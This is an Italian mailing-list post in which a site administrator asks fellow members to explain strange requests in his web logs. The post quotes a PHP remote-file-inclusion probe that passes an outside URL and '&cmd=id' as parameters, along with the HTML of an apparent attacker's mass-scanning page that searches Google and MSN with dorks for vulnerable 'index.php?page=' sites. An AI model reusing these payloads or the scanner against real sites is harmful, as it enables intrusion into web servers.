Re: [Hackmeeting] uno strano log

Borrar esta mensaxe

Responder a esta mensaxe
Autor: NeCoSi
Data:  
Para: hackmeeting, necosi
Asunto: Re: [Hackmeeting] uno strano log
continuo ad avere nei miei log una roba di sto tipo

/index.php?m=news&titolo=Censura_nella_sfera_informatica_italiana&id=http://busca.uol.com.br/uol/index.html?&cmd=id

id dovrebbe essere un numero e non quella schifezza
(id=http://busca.uol.com.br/uol/index.html)
inoltre viene aggiunto un &cmd=id che non è affatto previsto nel mio
script php

qualcuno viene sul sito e passa sti parametri alle mie pagine...
ma xkè? non riesco a capire... il potenziale pericolo?

dai gente smanettateci un po sopra :)

NeCoSi ha scritto:
> dai log del sito geekplace.org ho letto uno strano log
> si tratta di un php injection.
>
> una cosa del tipo:
> index.php?modulo=http//sito.com/script.php
>
> seguendo quel link si trova quanto segue
> se qualcuno ha voglia e sa fare una ricerca per capire di cosa si tratta
> sarebbe interessante capire cosa succede in rete
>
> da quel che ho notato è una sorta di motore di ricerca su
> busca.uol.com.br ma non sono sicuro, forse sto prendendo un abbaglio io...
> grazie, ciao
>
>
>
>
>
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head>
>          <meta http-equiv="Content-Type" content="text/html;
> charset=iso-8859-1">
>          <meta name="Generator" content="AoD">
>          <title>Scanning...</title>
>     </head><body
> onload="window.location='scan.php?id=35&sites=213.140.17.107-124622112306.txt';">Checking...
> [34] -
> http://www.darkreading.com/document.asp?doc_id=110363&f_src=http://busca.uol.com.br/uol/index.html?&cmd=id
> - [Bug <b>OFF</b>]</body>
> </html>

>
>
>
>
> <body
> onload="window.location='scan.php?id=0&sites=213.140.17.107-125047112306.txt';">
> Aguarde... este processo pode levar alguns minutos.<br>
>
>
>
> http://www.jaskiela.de/html/images/logos/.x/scan.php?id=39&sites=213.140.17.107-125047112306.txt
>
>
>
>
>
>
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
> <html><head>
> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
> <meta http-equiv="Content-Language" content="pt-br">
>
> <title>Scan v1.5.2</title><script type="text/javascript">
>     function go() {
>         var q = document.busca.q.value;
>         if (q == '') {
>             alert("Coloque todos os campos");
>             return false;
>         } else
>         {
>             if (document.mec.R1[0].checked)
>             {
>                 window.location='google.php?q='+q;
>             } else if (document.mec.R1[1].checked)
>             {
>                 window.location='msn.php?q='+q;
>             }
>             return false;
>         }
>     }
>     function show() {
>         if (document.mec.R1[0].checked)
>         {
>             document.getElementById('exemplos').innerHTML =
> 'allinurl:index.php?page=';
>         } else if (document.mec.R1[1].checked)
>         {
>             document.getElementById('exemplos').innerHTML =
> 'index.php?page=';
>         }
>     }

>
> </script></head>
>
>
>
>
> <body style="font-family: 'Lucida Console';" onload="show()">
>
> <div align="center">
> <center>
>
>   <table border="0" cellspacing="1" height="74" width="400">
>     <tbody><tr>
>       <td height="19" width="400">
>         <form method="post" action="#" style="margin: 0pt;"
> onsubmit="return go();" name="busca">
>           <p style="margin: 2px; font-size: 12px;">Busca: <input
> name="q" size="31" style="border: 1px solid rgb(0, 0, 0); font-family:
> 'Lucida Console'; font-size: 12px;" type="text"> <input value="Start"
> name="B1" style="border: 1px solid rgb(0, 0, 0); font-family: 'Lucida
> Console'; font-size: 12px;" type="submit"></p>
>         </form>
>       </td>
>     </tr>

>
>     <tr>
>       <td style="border-top: 1px solid rgb(0, 0, 0); border-bottom: 1px
> solid rgb(0, 0, 0); font-size: 12px;" height="18" width="400"><p
> style="margin: 2px;">Mecanismos &gt; <a id="exemplos" style="color:
> rgb(255, 0, 0);"></a></p></td>
>     </tr>
>     <tr>
>       <td height="19" width="400">
>         <form method="post" action="#" style="margin: 0pt;" name="mec">
>           <p style="margin: 2px; font-size: 12px;"><input value="V1"
> checked="checked" name="R1" onclick="show();" type="radio">Google</p>

>
>           <p style="margin: 2px; font-size: 12px;"><input name="R1"
> value="V2" onclick="show();" type="radio">Search MSN</p>
>         </form>
>       </td>
>     </tr>
>   </tbody></table>
>   </center>
> </div>

>
> </body></html>
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Hackmeeting mailing list
> Hackmeeting@???
> https://www5.autistici.org/mailman/listinfo/hackmeeting
>


--
Attualmente mi aggiro per http://GeekPlace.org
E Preferisco ricevere posta crittografata.
ID: 0x855C6C8C sul server: pgp.mit.edu

"Il fatto che un'opinione sia ampiamente condivisa, non è affatto una prova che non sia completamente assurda. Anzi, considerata la stupidità della maggioranza degli uomini, è più probabile che un'opinione diffusa sia cretina anziché sensata."
Bertrand Russell

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS/CM/IT a-- C++ L U+++ L++ W+++ PS+++ PE- PGP++ !tv G
------END GEEK CODE BLOCK------